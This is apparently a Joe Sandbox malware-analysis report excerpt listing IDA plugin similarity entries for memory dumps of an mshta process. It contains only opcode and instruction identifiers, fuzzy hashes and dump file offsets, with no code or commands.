                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e9bb61722b51fc5ff2e62b2f6dfe00c767ce9eb5c814f865e2932fbf7c6197fd
                                                                                                                                                                                                                                        • Instruction ID: d9c8cd45592909cc6c69088c81154939b07f295e1378118decc0ca3aaede516a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9bb61722b51fc5ff2e62b2f6dfe00c767ce9eb5c814f865e2932fbf7c6197fd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB51B5317042148FEB14CF48CA91AEDBBE5EF88354F148859E9969B392E771DC46CF81
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B9000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 500fbc40c724d180bf8ec55c039b48be51c8729f263d75a22e094528fb19b175
                                                                                                                                                                                                                                        • Instruction ID: 3e7e320c0ae06a17ea11a606812edafc86fe6633231df57947159f09e89a664e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 500fbc40c724d180bf8ec55c039b48be51c8729f263d75a22e094528fb19b175
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16419D31B292028FDF28CE68CA55BFCB7E9ABC9245F444A2DDA579B2C4D7649C40CF50
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d996d16f8582efd353b3ed124bc764ade74e4b210d58e3d1eb910a28258520dc
                                                                                                                                                                                                                                        • Instruction ID: 441bac29c8dc5b23e103de74485e0b39f56f353b9ba6c30a0f5e3b2f021dfd61
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d996d16f8582efd353b3ed124bc764ade74e4b210d58e3d1eb910a28258520dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A531EB36A04360DFEF20CA55C661BFAB7E8EF85B24F064499ED4767280C7A4AC50CBD1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474397393.000000000E9B5000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9737574ea2602981fb12911fc139fdcf95f4255c456f1f8858210132e38f8288
                                                                                                                                                                                                                                        • Instruction ID: be2939aa94c902d45b8e23ca6c64e7fc9ba53a8584caa62c0c39bd20f20ef16c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9737574ea2602981fb12911fc139fdcf95f4255c456f1f8858210132e38f8288
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D21F975304204AFD714CF28C981BA5BBE6EF89610F1545ACE96ACB392D770DC00CBA1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474397393.000000000E9B5000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B5000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 392b645fd2f41c6be6e75996e7d73d5d3e2620ff541213753343b3833020ef1c
                                                                                                                                                                                                                                        • Instruction ID: be2939aa94c902d45b8e23ca6c64e7fc9ba53a8584caa62c0c39bd20f20ef16c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 392b645fd2f41c6be6e75996e7d73d5d3e2620ff541213753343b3833020ef1c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D21F975304204AFD714CF28C981BA5BBE6EF89610F1545ACE96ACB392D770DC00CBA1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474459761.000000000E9BA000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9BA000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6c7d4a0bb97c730d52df9ec0558a52c1a19bdf662ea8828e33b8ddfca2ebcfc9
                                                                                                                                                                                                                                        • Instruction ID: 4731a4dd7308ca063e8ec928a49a335c06b2e6135dcdd49a54faac0525f39d1c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c7d4a0bb97c730d52df9ec0558a52c1a19bdf662ea8828e33b8ddfca2ebcfc9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0011D331A111249BCA74DA95CA81AEE7BA7FF80B10F104904E4076F284D778BD01CFD6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474459761.000000000E9BA000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B9000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 731bd09aa77e33da2d8ebcef36e1c407e10bee486761be0637e208f08c285c5f
                                                                                                                                                                                                                                        • Instruction ID: 4731a4dd7308ca063e8ec928a49a335c06b2e6135dcdd49a54faac0525f39d1c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 731bd09aa77e33da2d8ebcef36e1c407e10bee486761be0637e208f08c285c5f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0011D331A111249BCA74DA95CA81AEE7BA7FF80B10F104904E4076F284D778BD01CFD6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 41ba02d1569b1b426eada61cc81e363f59d4492fd2d34aee7bf79d1d1f03674f
                                                                                                                                                                                                                                        • Instruction ID: ec6d6a15b684c3faecb7b8b5944882e6e7802b9987a944baf2eccb45e2c9fbd8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41ba02d1569b1b426eada61cc81e363f59d4492fd2d34aee7bf79d1d1f03674f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8213636A10220CBEF248E49C6617F6B3E9EB88724F06456ADD5657390C7B5EC91CFC1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474397393.000000000E9B5000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: dc8dc6f5365bd713a6ed81fa06e57b1971c986bd649c2203eeffed4fab6c2c29
                                                                                                                                                                                                                                        • Instruction ID: c8e7ed3673ab610837c473f5d5db0fe855ae7b3bc9921b44e818966886dd2845
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc8dc6f5365bd713a6ed81fa06e57b1971c986bd649c2203eeffed4fab6c2c29
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2411EFB5A0A2149FEB10CF98D9507EABBEAEB48314F01455EE9169B380D3B58C058FC1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1f045762668ac6c4f26e242745e41623fbb228e687b7c9647df4469de5f733f1
                                                                                                                                                                                                                                        • Instruction ID: da8c57f8ad750648700b93956da71f3fbf1acaaeb3553b0d4bd1194fe23628bc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f045762668ac6c4f26e242745e41623fbb228e687b7c9647df4469de5f733f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70118675608205DFD715CF54C981AAAFBE5FF88320F048598EE999B396D730EC50CB92
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474397393.000000000E9B5000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B5000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 54555618880b614ae976a8d837637520485281684cb426578061dfabb2659e62
                                                                                                                                                                                                                                        • Instruction ID: c8e7ed3673ab610837c473f5d5db0fe855ae7b3bc9921b44e818966886dd2845
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54555618880b614ae976a8d837637520485281684cb426578061dfabb2659e62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2411EFB5A0A2149FEB10CF98D9507EABBEAEB48314F01455EE9169B380D3B58C058FC1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12469274133.000000000E9C4000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9C4000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9c4000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 76b80a7546dfae2c39807e6acd6854c335f086a012c1b7319c3fe1f270e3134f
                                                                                                                                                                                                                                        • Instruction ID: a60423d8d11b6a82e3e9d086542629f05e0eaf93d8e1322c0c1396648b6c471d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76b80a7546dfae2c39807e6acd6854c335f086a012c1b7319c3fe1f270e3134f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0611E132A096058FC314DEB8E84069DFBE8FB5E260B058A5EF45BA7750D7209C918F92
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12469274133.000000000E9C4000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9C7000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9c4000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 76b80a7546dfae2c39807e6acd6854c335f086a012c1b7319c3fe1f270e3134f
                                                                                                                                                                                                                                        • Instruction ID: a60423d8d11b6a82e3e9d086542629f05e0eaf93d8e1322c0c1396648b6c471d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76b80a7546dfae2c39807e6acd6854c335f086a012c1b7319c3fe1f270e3134f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0611E132A096058FC314DEB8E84069DFBE8FB5E260B058A5EF45BA7750D7209C918F92
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474828414.000000000E9B2000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 42bcd49bd909aa89e99d6f251a72810996dd45953928cb4b3d951445e75a72be
                                                                                                                                                                                                                                        • Instruction ID: 960dcd8096a48e7527e0659543b1411da981810a2d0f84a6a190db3be31e3d6a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42bcd49bd909aa89e99d6f251a72810996dd45953928cb4b3d951445e75a72be
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17019231708210DFCB10CF58DD81F99BBE4EF49255F0948A9E9598B322C720DC14CFA1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474828414.000000000E9B2000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B2000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b3269568a45d7952a0c37d43d3304cf7400bbf09aac91ec721604ce05d9dfb43
                                                                                                                                                                                                                                        • Instruction ID: 960dcd8096a48e7527e0659543b1411da981810a2d0f84a6a190db3be31e3d6a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3269568a45d7952a0c37d43d3304cf7400bbf09aac91ec721604ce05d9dfb43
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17019231708210DFCB10CF58DD81F99BBE4EF49255F0948A9E9598B322C720DC14CFA1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12469274133.000000000E9C4000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9C4000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9c4000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4102f529c680a5127d7e7b65be3c6a008090bc12ef6b309b39615813339930fe
                                                                                                                                                                                                                                        • Instruction ID: c17b8a10ee899472786e159a56d2333ec3e5f7a0f76f72109b6775fac231fdd7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4102f529c680a5127d7e7b65be3c6a008090bc12ef6b309b39615813339930fe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9501D432A0A3088FCB04EEF9D88056CF7E4FB5E2107448A5FE5169B345DB609C408FA2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12469274133.000000000E9C4000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9C7000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9c4000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4102f529c680a5127d7e7b65be3c6a008090bc12ef6b309b39615813339930fe
                                                                                                                                                                                                                                        • Instruction ID: c17b8a10ee899472786e159a56d2333ec3e5f7a0f76f72109b6775fac231fdd7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4102f529c680a5127d7e7b65be3c6a008090bc12ef6b309b39615813339930fe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9501D432A0A3088FCB04EEF9D88056CF7E4FB5E2107448A5FE5169B345DB609C408FA2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B4000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ed549f9da8048f7d5af09ee334f50fbdd13920194ca7822c2bfce5ad3774241e
                                                                                                                                                                                                                                        • Instruction ID: a515130dd565eec000e4783052442ab5ef7f458846e2384f075c54f989a67734
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed549f9da8048f7d5af09ee334f50fbdd13920194ca7822c2bfce5ad3774241e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8E0DF3220E3C04FC7028E14ACA14E2BBB0AE4712831C49DBEDA9CB143D6298D2ACB51
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ed549f9da8048f7d5af09ee334f50fbdd13920194ca7822c2bfce5ad3774241e
                                                                                                                                                                                                                                        • Instruction ID: a515130dd565eec000e4783052442ab5ef7f458846e2384f075c54f989a67734
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed549f9da8048f7d5af09ee334f50fbdd13920194ca7822c2bfce5ad3774241e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8E0DF3220E3C04FC7028E14ACA14E2BBB0AE4712831C49DBEDA9CB143D6298D2ACB51
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474775734.000000000E9B3000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 765917d5f10b372faf6d0ef3046a271e3f12cca52e51b9ca1953ef28f7040859
                                                                                                                                                                                                                                        • Instruction ID: 0db9b072b307fd5f14d435ca5004f47aa2c272460b779f7c01020e0b77ea8c17
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 765917d5f10b372faf6d0ef3046a271e3f12cca52e51b9ca1953ef28f7040859
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACE07D2058E25C2EF331D13038237E16A84AB02908F05869ADC0212342C7C90C9883E2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474775734.000000000E9B3000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B3000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 80736af250475e205b58f9ce11cb19b363a990e457cfc416c7c74df8ee922174
                                                                                                                                                                                                                                        • Instruction ID: 0db9b072b307fd5f14d435ca5004f47aa2c272460b779f7c01020e0b77ea8c17
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80736af250475e205b58f9ce11cb19b363a990e457cfc416c7c74df8ee922174
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACE07D2058E25C2EF331D13038237E16A84AB02908F05869ADC0212342C7C90C9883E2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B4000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: eb37909841707693b335b79144027262195c1c95070a0e1e1cf3d1b9fed6c1cf
                                                                                                                                                                                                                                        • Instruction ID: 4b1f9a57d299d56f5befa995826298a360dc38cc6d2da74ec373e88db2d33db4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb37909841707693b335b79144027262195c1c95070a0e1e1cf3d1b9fed6c1cf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4ED05E32A492428F83018B18E841591F7A4EF9227572843BBDCB987211D61148325B80
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: eb37909841707693b335b79144027262195c1c95070a0e1e1cf3d1b9fed6c1cf
                                                                                                                                                                                                                                        • Instruction ID: 4b1f9a57d299d56f5befa995826298a360dc38cc6d2da74ec373e88db2d33db4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb37909841707693b335b79144027262195c1c95070a0e1e1cf3d1b9fed6c1cf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4ED05E32A492428F83018B18E841591F7A4EF9227572843BBDCB987211D61148325B80
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B9000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6105b512a9d9f2adeef114a6269897bb992f1e6339624848c00eaea2837f5a62
                                                                                                                                                                                                                                        • Instruction ID: eb9fb1fd967b6460145e23ee8834d200827b2e699d1804e9f121515bcba13a9c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6105b512a9d9f2adeef114a6269897bb992f1e6339624848c00eaea2837f5a62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0D017725053008FD3208F98E801785F7F4EF96234F14829AED28CB221D3719926CB41
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474098572.000000000E9B9000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9BC000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b9000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6105b512a9d9f2adeef114a6269897bb992f1e6339624848c00eaea2837f5a62
                                                                                                                                                                                                                                        • Instruction ID: eb9fb1fd967b6460145e23ee8834d200827b2e699d1804e9f121515bcba13a9c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6105b512a9d9f2adeef114a6269897bb992f1e6339624848c00eaea2837f5a62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0D017725053008FD3208F98E801785F7F4EF96234F14829AED28CB221D3719926CB41
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474397393.000000000E9B5000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B7000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                        • Instruction ID: e05eadea12e8b5d3c61725c860376dbf45120fb8eafab68730bf4e56d8d4ed5d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99C0123270A1048B8700CE8DECC089AF398FB88274B1487A7EE08CB222DA91DC244B91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474397393.000000000E9B5000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
